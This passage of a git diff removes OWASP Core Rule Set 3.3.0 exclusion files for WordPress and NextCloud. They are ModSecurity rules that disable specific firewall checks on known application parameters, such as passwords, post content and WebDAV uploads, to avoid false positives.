phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS" - -SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ - "id:9002001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS" - - -# -# -=[ WordPress Front-End ]=- -# - - -# -# [ Login form ] -# - -# User login password -SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ - "id:9002100,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ - ver:'OWASP_CRS/3.3.0'" - -# Reset password -SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ - "id:9002120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq resetpass" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - - -# -# [ Comments ] -# - -# Post comment -SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ - "id:9002130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Gutenberg Editor ] -# Used when a user (auto)saves a post/page with Gutenberg. -# - -# Gutenberg -SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \ - "id:9002140,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\ - ver:'OWASP_CRS/3.3.0'" - -# Gutenberg via rest_route for sites without pretty permalinks -SecRule REQUEST_FILENAME "@endsWith /index.php" \ - "id:9002141,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &ARGS:rest_route "@eq 1" \ - "t:none,\ - nolog,\ - chain" - SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content" - -# Gutenberg upload image/media -SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \ - "id:9002142,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=200002,\ - ctl:ruleRemoveById=200003,\ - ver:'OWASP_CRS/3.3.0'" - -# Gutenberg upload image/media via rest_route for sites without pretty permalinks -SecRule REQUEST_FILENAME "@endsWith /index.php" \ - "id:9002143,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &ARGS:rest_route "@eq 1" \ - "t:none,\ - nolog,\ - chain" - SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \ - "t:none,\ - ctl:ruleRemoveById=200002,\ - ctl:ruleRemoveById=200003" - -# -# [ Live preview ] -# Used when an administrator customizes the site and previews the result -# as a normal user. -# - -# Theme select -# Example: wp_customize=on&theme=twentyfifteen&customized= -# {"old_sidebars_widgets_data":{"wp_inactive_widgets":[], -# "sidebar-1":["search-2","recent-posts-2","recent-comments-2", -# "archives-2","categories-2","meta-2"]}}&nonce=XXX& -# customize_messenger_channel=preview-0 -SecRule ARGS:wp_customize "@streq on" \ - "id:9002150,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &ARGS:action "@eq 0" \ - "t:none,\ - ctl:ruleRemoveTargetById=942200;ARGS:customized,\ - ctl:ruleRemoveTargetById=942260;ARGS:customized,\ - ctl:ruleRemoveTargetById=942300;ARGS:customized,\ - ctl:ruleRemoveTargetById=942330;ARGS:customized,\ - ctl:ruleRemoveTargetById=942340;ARGS:customized,\ - ctl:ruleRemoveTargetById=942370;ARGS:customized,\ - ctl:ruleRemoveTargetById=942430;ARGS:customized,\ - ctl:ruleRemoveTargetById=942431;ARGS:customized,\ - ctl:ruleRemoveTargetById=942460;ARGS:customized" - -# Appearance -> Widgets -> Live Preview -SecRule ARGS:wp_customize "@streq on" \ - "id:9002160,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942200;ARGS:customized,\ - ctl:ruleRemoveTargetById=942260;ARGS:customized,\ - ctl:ruleRemoveTargetById=942300;ARGS:customized,\ - ctl:ruleRemoveTargetById=942330;ARGS:customized,\ - ctl:ruleRemoveTargetById=942340;ARGS:customized,\ - ctl:ruleRemoveTargetById=942370;ARGS:customized,\ - ctl:ruleRemoveTargetById=942430;ARGS:customized,\ - ctl:ruleRemoveTargetById=942431;ARGS:customized,\ - ctl:ruleRemoveTargetById=942460;ARGS:customized,\ - ctl:ruleRemoveTargetById=920230;ARGS:partials,\ - ctl:ruleRemoveTargetById=941320;ARGS:partials,\ - ctl:ruleRemoveTargetById=942180;ARGS:partials,\ - ctl:ruleRemoveTargetById=942200;ARGS:partials,\ - ctl:ruleRemoveTargetById=942260;ARGS:partials,\ - ctl:ruleRemoveTargetById=942330;ARGS:partials,\ - ctl:ruleRemoveTargetById=942340;ARGS:partials,\ - ctl:ruleRemoveTargetById=942370;ARGS:partials,\ - ctl:ruleRemoveTargetById=942430;ARGS:partials,\ - ctl:ruleRemoveTargetById=942431;ARGS:partials,\ - ctl:ruleRemoveTargetById=942460;ARGS:partials" - - - -# Self calls to wp-cron.php?doing_wp_cron=[timestamp] -# These requests may be missing Accept, Content-Length headers. -# This rule must run in phase:1. -SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \ - "id:9002200,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=920180,\ - ctl:ruleRemoveById=920300,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Cookies ] - -# WP Session Manager -# Cookie: _wp_session=[hex]||[timestamp]||[timestamp] -# detected SQLi using libinjection with fingerprint 'n&1' -SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \ - "id:9002300,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session" - - -# -# -=[ WordPress Administration Back-End (wp-admin) ]=- -# - -# Skip this section for performance unless /wp-admin/ is in filename - -SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ - "id:9002400,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS-ADMIN" - -SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ - "id:9002401,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS-ADMIN" - - -# -# [ Installation ] -# - -# WordPress installation: exclude database password -SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \ - "id:9002410,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:step "@streq 2" \ - "t:none,\ - chain" - SecRule &ARGS:step "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" - -# WordPress installation: exclude admin password -SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \ - "id:9002420,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:step "@streq 2" \ - "t:none,\ - chain" - SecRule &ARGS:step "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text" - - -# -# [ User management ] -# - -# Edit logged-in user -SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \ - "id:9002520,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ - ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ - ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ - ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ - ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ - ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ - ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ - ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ - ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - -# Edit user -SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \ - "id:9002530,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ - ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ - ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ - ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ - ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ - ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ - ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ - ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ - ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - -# Create user -SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \ - "id:9002540,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq createuser" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - - -# -# [ General exclusions ] -# - -# _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages -SecAction \ - "id:9002600,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\ - ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\ - ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\ - ver:'OWASP_CRS/3.3.0'" - -# -# [ Content editing ] -# - -# Edit posts and pages -# /wp-admin/post.php, /wp-admin/post.php?t=[timestamp] -# - Themes do not properly escape post_title in HTML, so beware of XSS -# and be conservative in excluding this parameter. -# - Parameter _wp_http_referer can appear multiple times. -SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ - "id:9002700,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ - ctl:ruleRemoveById=920272,\ - ctl:ruleRemoveById=921180" - -# Autosave posts and pages -# ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002710,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq heartbeat" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\ - ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\ - ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\ - ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\ - ctl:ruleRemoveById=921180,\ - ctl:ruleRemoveById=920272" - -# Edit menus -SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ - "id:9002720,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\ - ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\ - ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data" - -# Edit text widgets (can contain custom HTML) -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002730,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]" - -# Reorder widgets -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002740,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq widgets-order" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\ - ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\ - ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]" - -# Create permalink sample for new post -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002750,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq sample-permalink" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title" - -# Add external link to menu -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002760,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq add-menu-item" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]" - -# Editor: Add Media, Insert Media, Insert into page -SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ - "id:9002770,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq send-attachment-to-editor" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html" - - -# -# [ Options and Settings ] -# - -# Change site URL -SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ - "id:9002800,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:option_page "@streq general" \ - "t:none,\ - chain" - SecRule &ARGS:option_page "@eq 1" \ - "t:none,\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=931130;ARGS:home,\ - ctl:ruleRemoveTargetById=931130;ARGS:siteurl" - -# Permalink settings -# permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/ -SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ - "id:9002810,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=920230;ARGS:selection,\ - ctl:ruleRemoveTargetById=920272;ARGS:selection,\ - ctl:ruleRemoveTargetById=942431;ARGS:selection,\ - ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\ - ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ - ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ - ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ - ver:'OWASP_CRS/3.3.0'" - -# Comments blacklist and moderation list -SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ - "id:9002820,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:option_page "@streq discussion" \ - "t:none,\ - chain" - SecRule &ARGS:option_page "@eq 1" \ - "t:none,\ - chain" - SecRule ARGS:action "@streq update" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys" - -# Posts/pages overview search -SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ - "id:9002830,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Helpers ] -# - -# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, -# admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags, -# jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D= -# wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget, -# jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1 -# -# /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons, -# admin-bar,buttons,media-views,common,forms,admin-menu,dashboard, -# list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D= -# s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1 -# -# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, -# admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer, -# wp-ajax-response,jquery-color,wp-lists,quicktags, -# jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core, -# jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore, -# customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install, -# wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter, -# jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e -SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ - "id:9002900,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=921180,\ - ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\ - ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\ - ctl:ruleRemoveTargetById=942360;ARGS:load[],\ - ctl:ruleRemoveTargetById=942430;ARGS:load[],\ - ctl:ruleRemoveTargetById=942431;ARGS:load[],\ - ctl:ruleRemoveTargetById=942432;ARGS:load[],\ - ver:'OWASP_CRS/3.3.0'" - - -SecMarker "END-WORDPRESS-ADMIN" - - -SecMarker "END-WORDPRESS" diff --git a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf b/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf deleted file mode 100644 index b0ee6fb8fb..0000000000 --- a/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf +++ /dev/null @@ -1,415 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default NextCloud install. -# They will likely work with OwnCloud too, but you may have to modify them. -# The exclusions are only active if crs_exclusions_nextcloud=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. -# -# To relax upload restrictions for only the php files that need it, -# you put something like this in crs-setup.conf: -# -# SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \ -# "id:9003330,\ -# phase:1,\ -# t:none,\ -# nolog,\ -# pass,\ -# tx.restricted_extensions='.bak/ .config/ .conf/'" -# -# Large uploads can be modified with SecRequestBodyLimit. Or they -# can be more controlled by using the following: -# -# SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \ -# "id:9003610,\ -# phase:1,\ -# t:none,\ -# nolog,\ -# ctl:requestBodyLimit=1073741824" -# -# --------------------- - - -SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ - "id:9003000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-NEXTCLOUD" - -SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ - "id:9003001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-NEXTCLOUD" - - -# -# [ File Manager ] -# -# -# The web interface uploads files, and interacts with the user. - -SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ - "id:9003100,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveByTag=attack-injection-php,\ - ctl:ruleRemoveById=941000-942999,\ - ctl:ruleRemoveById=951000-951999,\ - ctl:ruleRemoveById=953100-953130,\ - ctl:ruleRemoveById=920420,\ - ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.3.0'" - -# Skip PUT parsing for invalid encoding / protocol violations in binary files. - -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003105,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ - "t:none,\ - ctl:ruleRemoveById=920000-920999,\ - ctl:ruleRemoveById=932000-932999,\ - 